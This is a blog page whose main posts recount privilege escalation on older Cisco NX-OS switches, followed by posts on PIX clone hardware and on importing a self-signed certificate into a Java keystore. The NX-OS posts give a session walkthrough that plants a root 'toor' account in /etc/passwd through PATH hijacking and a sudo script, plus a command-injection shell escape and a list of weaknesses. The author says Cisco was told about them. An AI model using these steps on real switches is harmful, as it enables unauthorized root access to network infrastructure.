Hacking NX-OS Part 3

Some notes from when I first started hacking away at NX-OS in 2011:

Basically the Nexus underlying operating system, made by MonteVista, which was formally called Hard Hat Linux (a hardened version of Red Hat Linux).  I can tell you that there are numerous ways to attack these boxes.  Some that I have found:

  1. PATH not properly set in shell scripts
  2. Input not properly sanity checked in scripts
  3. IFS together with PATH exploitable
  4. gdbserver running has root, can allow you to kill any process, including securityd
  5. The binaries for the most part are stripped.  So there is no symbol information, I plan to eventually re-construct the symbol table using some tools.  This combined with gdb would give you the ability to call any function you want as root.
  6. Many processes run as root (via /etc/sudoers), its very sloppy
  7. I have found at least 5 ways to get shell access.
  8. gdb could (Theoritically) be used to overflow the stack on a number of functions to run arbitrary shellcode.  I haven’t done this because its tedious but should work.  The security problem is that you can use gdb to remotely connect in the first place.
  9. At least one serious problem is the ability to crash a nexus remotely via CDP, I don’t believe this is fixed yet.

Productive evening.  I was able to get shell access on a 5k, 7k, 1000v, and MDS, that is from the CLI I was able to get to an actual bash shell.  Oddly using different exploits on MDS vs. 5k/7k/1000v.  As far as I know these are not known to Cisco.  Its not really a serious issue since you have to have access to the box anyways.  I only tried as admin, but its likely to work from any user level.

I did not post every method that I was able to obtain root with, nor did I post the straight forward malicious methods such as constructing a special CDP packet that will take  NX-OS down every time (at least it used to).  If you have any interesting things you have found in NX-OS please let me know!

gdb

The gdb is visable via the which command.  you can do “sh processes” and see all processes, then use “gdp <process id>” to run gdb as a server.

Then from your workstation  you can connect to gdb process using “gdb target remote x.x.x.x:yyyyy" where x.x.x.x is the ip address of the mds and yyyyyy is the port the gdb says its listening on (starts at 10001).  Then you can use gdb to do things like stack smashing and other hacks.  These are advanced topics beyond what I am willing to write here, but trival for those that know security and gdb.

I have found many security holes in the shell programs, and can pass things from CLI that crash the system.  Yes most of these work in older versions of SanOS as well as NX-OS.

 

Posted in Cisco, Network Technology, Nexus, NX-OS | Tagged , | Leave a comment

Hacking NX-OS Part 2

You can see in my previous article, that I used the “bash” command.  In later NX-OS versions this was not possible.  After rooting the box, I spent a lot of time learning about all of the shell scripts and binaries on the filesystem, and I continued to hack at them.

What became my “goto” command was “this“.  I think “this” was an undocumented command.  But once you hack into the filesystem you could see it was a command that was available.

The most common hack I would do was to do like so:

this ;bash vi

and then just use :shell from within vi……..this gives you a shell, you can look around and do whatever you like.

When doing shells from within NX-OS, you may not end up with an interactive shell, so you must redirect to your tty to see the output like so:

 

df > /dev/pts/0
Filesystem           1k-blocks      Used Available Use% Mounted on
/dev/pssblkdrv           59493       214     56207   1% /data_store
none                    409600    158696    250904  39% /isan
none                    102400      164    102236   1% /var/tmp
none                    153600        0    153600   0% /var/sysmgr
none                    307200    25748    281452   9% /var/sysmgr/ftp
none                    204800     3936    200864   2% /dev/shm
none                     61440        8     61432   1% /volatile
none                      2048         0      2048   0% /debug
/dev/hd-cfg0             19564      1145     17409   7% /mnt/cfg/0
/dev/hd-cfg1             19317      1145     17175   7% /mnt/cfg/1
/dev/hd-pss              19580      2826     15743  16% /mnt/pss
/dev/hd-bootflash       181724     94174     78168  55% /bootflash
127.1.2.2:/mnt/cf/partner
186683    13960    163085   8% /modflash_2-1

id > /dev/pts/0
uid=2002(admin) gid=503(network-admin) groups=503(network-admin)

uname -a > /dev/pts/0
Linux MDS4 2.4.20_mvl31-cpci735 #1 Wed Dec 16 15:50:36 PST 2009 i686 unknown

cat /etc/passwd > /dev/pts/0
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm

Posted in Cisco, Network Technology, Nexus, NX-OS | Tagged , | Leave a comment

Hacking NX-OS Part 1

Some of you may know me as a sage hacker from the mid 80’s to the early 90’s.  Although, if you met me after 1994, most of you probably don’t know that about me at all.  It was a previous life.  Sufficient time has passed since I have informed Cisco about numerous security vulnerabilities in older versions of NX-OS that I can now make this post.  I have no idea if these are even still relevant in newer versions.  I hack stuff, and I move on.  I was quite involved in NX-OS years ago as it was based on SanOS, which was an OS that I became intimately familiar with while getting my CCIE Storage.  Now of days I focus on advanced Software Engineering and doing anything on a beach!  You may wish to read my articles:

Deconstructing Cisco NX-OS Part 1: Exploding Kickstart
Deconstructing Cisco NX-OS Part 2: Exploding the System Image

 

A walk through hacking NX-OS:

We log in as normal.

login: admin
Password:
Last login: Fri Mar 25 07:25:34 UTC 2011 on ttyS0
Last login: Fri Mar 25 07:41:04 on ttyS0
Cisco NX-OS Software
Copyright (c) 2002-2010, Cisco Systems, Inc. All rights reserved.
switch#

You can see we can run bash, look at our environment, specifically our PWD and PATH:

switch# bash set
% Warning, couldn’t set default directory, Using ‘/’ instead
BASH=/bin/sh
BASH_ARGC=()
BASH_ARGV=()
BASH_EXECUTION_STRING=set
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]=”3″ [1]=”2″ [2]=”33″ [3]=”1″ [4]=”release” [5]=”i586-wrs-linux-gnu”)
BASH_VERSION=’3.2.33(1)-release’
CLIC_LEVEL=0
COLUMNS=80
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)’
HOSTTYPE=i586
IFS=’   ‘
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
POSIXLY_CORRECT=y
PPID=5305
PS4=’+ ‘
PWD=/
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SLOT_NUM=0
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=sh

We can view /etc/passwd, its your normal NX-OS /etc/passwd, root user locked out, etc.

switch# bash cat /etc/passwd
% Warning, couldn’t set default directory, Using ‘/’ instead root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
__eemuser:*:101:100:eemuser:/var/home/__eemuser:/isanboot/bin/nobash
adminbackup:x:0:0::/var/home/adminbackup:/bin/bash
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm

Lets create a script, we have write access to the filesystem, using the “nbv123” pass which is what is default for ftpuser 

switch# bash echo “#!/bin/bash” > /tmp/cat
% Warning, couldn’t set default directory, Using ‘/’ instead
switch# bash echo “echo toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash >> /etc/passwd” >> /tmp/cat
% Warning, couldn’t set default directory, Using ‘/’ instead
switch# bash cat /tmp/cat
% Warning, couldn’t set default directory, Using ‘/’ instead
#!/bin/bash
echo toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash >> /etc/passwd

Set the file to execute

switch# bash chmod 755 /tmp/cat
% Warning, couldn’t set default directory, Using ‘/’ instead
switch# bash ls -al /tmp/cat
% Warning, couldn’t set default directory, Using ‘/’ instead
-rwxr-xr-x 1 admin network-admin 76 Mar 25 07:29 /tmp/cat

Make sure we can manipulate PATH and put our CWD “.” as the first entry.  

The bash is spawned each instance of the command, so we have to set path in the same instance as the program we execute

switch# bash cd /tmp;PATH=.:$PATH;set
% Warning, couldn’t set default directory, Using ‘/’ instead
BASH=/bin/sh
BASH_ARGC=()
BASH_ARGV=()
BASH_EXECUTION_STRING=’cd /tmp;PATH=.:$PATH;set’
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]=”3″ [1]=”2″ [2]=”33″ [3]=”1″ [4]=”release” [5]=”i586-wrs-linux-gnu”)
BASH_VERSION=’3.2.33(1)-release’
CLIC_LEVEL=0
COLUMNS=80
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)’
HOSTTYPE=i586
IFS=’   ‘
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OLDPWD=/
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=.:/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
PIPESTATUS=([0]=”0″)
POSIXLY_CORRECT=y
PPID=5305
PS4=’+ ‘
PWD=/tmp
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=

Check our current id

switch# bash id
% Warning, couldn’t set default directory, Using ‘/’ instead
uid=2002(admin) gid=503(network-admin) groups=503(network-admin)

I can’t post this command as it would not be good, but you get the point

switch# bash cd /tmp;PATH=.:$PATH;set;sudo /isan/bin/perf-cmd.sh
% Warning, couldn’t set default directory, Using ‘/’ instead
BASH=/bin/sh
BASH_ARGC=()
BASH_EXECUTION_STRING=’cd /tmp;PATH=.:$PATH;set;sudo /isan/bin/perf-cmd.sh’
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]=”3″ [1]=”2″ [2]=”33″ [3]=”1″ [4]=”release” [5]=”i586-wrs-linux-gnu”)
BASH_VERSION=’3.2.33(1)-release’
CLIC_LEVEL=0
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)’
HOSTTYPE=i586
IFS=’   ‘
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OLDPWD=/
OPTERR=1
OSTYPE=linux-gnu
PATH=.:/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
PIPESTATUS=([0]=”0″)
POSIXLY_CORRECT=y
PPID=5305
PWD=/tmp
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SLOT_NUM=0
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=

Check /etc/passwd

switch# bash cat /etc/passwd
% Warning, couldn’t set default directory, Using ‘/’ instead
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
adminbackup:x:0:0::/var/home/adminbackup:/bin/bash
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm
toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash

SUCCESS!

switch# exit
login: toor
Password:
Last login: Fri Mar 25 07:24:46 UTC 2011 on ttyS0
Last login: Fri Mar 25 07:32:34 on ttyS0
root@(none):/root> w
07:32:37 up  1:31,  1 user,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
toor     ttyS0    –                07:32    0.00s  0.00s  0.00s w
root@(none):/root> ls -al
total 12
drwxr-x—  2 root root 100 Mar 25 07:25 .
drwxr-xr-x 35 root root 780 Mar 25 06:01 ..
-rw——-  1 root root  15 Mar 25 07:25 .bash_history
-rw-r–r–  1 root root  15 Jan 13  2009 .bash_logout
-rw-r–r–  1 root root 191 Jan 13  2009 .profile
root@(none):/root> id
uid=0(root) gid=0(root) groups=0(root)
root@(none):/root> w
07:33:28 up  1:32,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
toor     ttyS0    –                07:32    0.00s  0.00s  0.00s w

Posted in CCIE Routing and Switching, CCIE Storage, Cisco, Network Technology, Nexus, NX-OS | Tagged , | Leave a comment

Old frankenpix information

Just posted here to preserve it for posterity.

In the old days, I would make Frankenpix boxes.  These would be basically identical to a PIX520 or LocalDirector 430/416.  They were Cisco PIX/LocalDirector clones, using the following hardware, and they worked great:

 

MOTHERBOARD:
Intel Motherboard SE440BX-2 $ 100

NETWORK INTERFACE:
Intel Pro100/B 10/100 NIC PRO100/B $ 40
– OR –
Osicom 4 Ethernet Port PCI OLN-2404TX $ 900

ISA FLASH CARD:
16MB ISA Flash Card (PEP) CISCO – $ 700
– OR –
4MB ISA Flash Card (??) ?? $ –?

The difficult part in all of this was acquiring the ISA Flash card, which usually you had to canabilize out of a dead PIX.

 

 

Posted in Uncategorized | Tagged , | Leave a comment

Get self-signed certificates to work with Cloud Foundry Integration for Eclipse Plug-In

featured-pcfIf your like myself you use self-signed certificates in your lab environment, as its quick and easy.  In my Pivotal Cloud Foundry lab I have generated a self-signed certificate in the Elastic Runtime configuration.  When you have a self-signed certificate you add --skip-ssl-validation to your cf api and cf login commands.

With the latest builds of the Cloud Foundry Integration for Eclipse Plug-In, self-signed certificates have an issue.  They will generate an error with something to the effect of:

Caused by: sun.security.validator.ValidatorException: 
    PKIX path building failed: 
    sun.security.provider.certpath.SunCertPathBuilderException: 
    unable to find valid certification path to requested target

 

It will ask you if you wish to ignore this, but regardless the integration will fail, and it won’t be able to validate your credentials, and so you will have no Cloud Foundry integration.

I really like the Cloud Foundry integration in Eclipse so I set off on a way to figure out how to make it work.  Originally I tried an older version of the plug-in, version 1.7.3, which appeared to work.  I was using this with PCF 1.4.0.0 which has just been released.  I removed an application however, and when it did, I believe it removed my apps_manager application which exists in the system org.  I know this sounds weird, because 1) the plug-in should not be removing the apps_manager service under any circumstances, 2) even if it wanted to, my credentials I used in Spring Tool Suite did not have the authority to remove an app from the system org.  I did not spend a lot of time looking into this, I just noticed that I removed an application, and all the sudden my developer console was gone.  (Developer Console is now known as Apps Manager).

To get the integration to work you need to add the self-signed certificate from your PCF to your Java keystore.  Its important to understand which version of Java your running, you may have several versions of Java installed.  Typically the version that is being used is defined by $JAVA_HOME, but you’ll want to verify with STS/Eclipse which version its using or maybe add the certificate to all your versions.

I use a Mac, and typically the original Java installed by Apple is in /System/Library/Java/JavaVirtualMachines.  For example my system has like so:

nettles:~ bfeeny$ ls /System/Library/Java/JavaVirtualMachines/
1.6.0.jdk

This however is not the version I am using.  When you install later versions, from Oracle for example, they are installed in /Library/Java/JavaVirtualMachines:

nettles:~ bfeeny$ ls /Library/Java/JavaVirtualMachines/
jdk1.7.0_76.jdk

This is the one I am using, and it can be further verified by looking at my $JAVA_HOME:

nettles:~ bfeeny$ echo $JAVA_HOME
/Library/Java/JavaVirtualMachines/jdk1.7.0_76.jdk/Contents/Home

Java stores its trusted certificates in a keystore, which on my system is located at

$JAVA_HOME/jre/lib/security/cacerts

The first thing to do is extract the self-signed certificate from your Cloud Foundry, an easy way to do this is using openssl like so:

nettles:~ bfeeny$ openssl s_client -connect api.cf.lab.local:443 < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /tmp/public.crt
depth=0 C = US, O = Pivotal, CN = *.cf.lab.local

verify error:num=18:self signed certificate
verify return:1
depth=0 C = US, O = Pivotal, CN = *.cf.lab.local
verify return:1
DONE

We can verify its there:

nettles:~ bfeeny$ more /tmp/public.crt
-----BEGIN CERTIFICATE-----
MIIDHDCCAgSgAwIBAgIVAP1HgDzBrzGSFY9lUTvpeOl0fpxPMA0GCSqGSIb3DQEB
BQUAMDgxCzAJBgNVBAYTAlVTMRAwDgYDVQQKDAdQaXZvdGFsMRcwFQYDVQQDA4qa
LmNmLmxhYi5sb2NhbDAeFw0xNTA0MTUwMTQ0NTFaFw0xNzA0MTQwMTQ0NTFMDgxx
CzAJBgNVBAYTAlVTMRAwDgYDVQQKDAdQaXZvdGFsMRcwFQYDVQQDDA4qLmNmLmxh
Yi5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMPL/JZ2Ehqt
kLzJn2mlS0XTURSdeaZvaSqdwMvm9Fg7UauC8pI5mAAxg/PEmlY5NXbXuOMrO6WK
ZLy3mQbCdhgw5JWc/qKJV9SQHP0Npn27mLjhiydo08kXv2IzKVwm5YfPkEw5u5SE
GgPzSqQUIiziLuhpMr7ztir4OICvmj8u0LebpKXyO3y+deeibYNLislu/lrr9ZKD
7ADgiM4tZH/c21HVf6cFz9eBbAoCqXY/Q+nZeRb2o4rxmDitojqf30WK9i+Qhqeu
18QPX/EFRIhFrBCYs6YloUDBrPtVvZrOX7kp5zxBGC89+XmMmLUzFzkYpGld9Mfg
l+En+ZQen4cCAwEAAaMdMBswGQYDVR0RBBIwEIIOKi5jZi5sYWIubG9jYWwwDQYJ
KoZIhvcNAQEFBQADggEBAJ+B6P2zkpWp8F7L5N/gRWwM2sumpXUJNwQU3m9ylM5U
yJOgifrk3f410LWsoifbs2Rd7re8NOV7Sud15gjCGI/Zw8mFJElSqd0HrPw0WFB/

v55p/cNKgZJQ4bcpZ0Jp7Y7P7FzLcp76wAacljnbYGkXdxCsrtpUd/VxtNzOeIBP
dbQQxW6Ph9cvSx/w28AaoU9DeoqZvOTnQu2Rltfn6lBPijWQWTEXltiS1WPCyyd+
2Gnl+acnNerspdnHn1lte4ydDR+uq2hYnCJSrlMXaR5TAp3dpwMxtSHA71zkVS61
VRU/vLLtyz3JzAmhGepZ6m2vt2vMNPNGKxVS0c/odNI=
-----END CERTIFICATE-----

Of course, if you have access to the Ops Manager, you can just go into the Elastic Runtime tile and look at the IPs and Ports and grab the certificate from there, that is where you created it in the first place.  There are two certificates listed, the first one is the public one, which is the one you want, and the second is the private.  Whether you use openssl or just cut and paste it, the result should be the same.

Ops_Manager_and_bfeeny_—_root_4b620d1c-cad4-4395-a85a-21f2e357fb43___var_vcap_bosh_log_—_bash_—_165×27_and_pcf-docs-1_4__page_6_of_480_

 

 

 

 

 

Now you simply have to import the certificate into the Java keystore:

nettles:~ bfeeny$ sudo keytool -import -alias api.cf.lab.local -keystore $JAVA_HOME/jre/lib/security/cacerts -file /tmp/public.crt
Password: <enter your admin password here>
Enter keystore password:  <default password is changeit>
Owner: CN=*.cf.lab.local, O=Pivotal, C=US
Issuer: CN=*.cf.lab.local, O=Pivotal, C=US
Serial number: fd47803cc1af3192158f65513be978e9747e9c4f
Valid from: Tue Apr 14 21:44:51 EDT 2015 until: Thu Apr 13 21:44:51 EDT 2017
Certificate fingerprints:
MD5:  C4:DA:C3:02:B4:25:FC:A9:1E:A1:FB:3A:E0:F7:B5:AD
SHA1: EB:A4:1E:A5:EA:D4:BE:7A:A3:CD:9B:D4:4D:BF:1F:1C:DD:97:52:ED
SHA256: 12:7C:1E:69:32:D4:28:FE:6B:EE:2A:DE:91:FB:76:5E:A6:1F:29:DA:15:A5:4C:21:E8:4C:73
83:BE:0A:78:77
Signature algorithm name: SHA1withRSA
Version: 3
Extensions:
#1: ObjectId: 2.5.29.17 Criticality=false
SubjectAlternativeName [
 DNSName: *.cf.lab.local
]
Trust this certificate? [no]:  yes
Certificate was added to keystore

After this is done, simply restart your Eclipse or Spring Tool Suite application, and it should now allow you to add a Cloud Foundry instance with no issue.  If you have already added an instance, simply delete it and re-add it.  Fill out your credentials, and all should validate properly.

Update: I passed this onto Pivotal and they have added it to their Knowledge Base!

Posted in Cloud Foundry, Pivotal | Tagged , , , | Leave a comment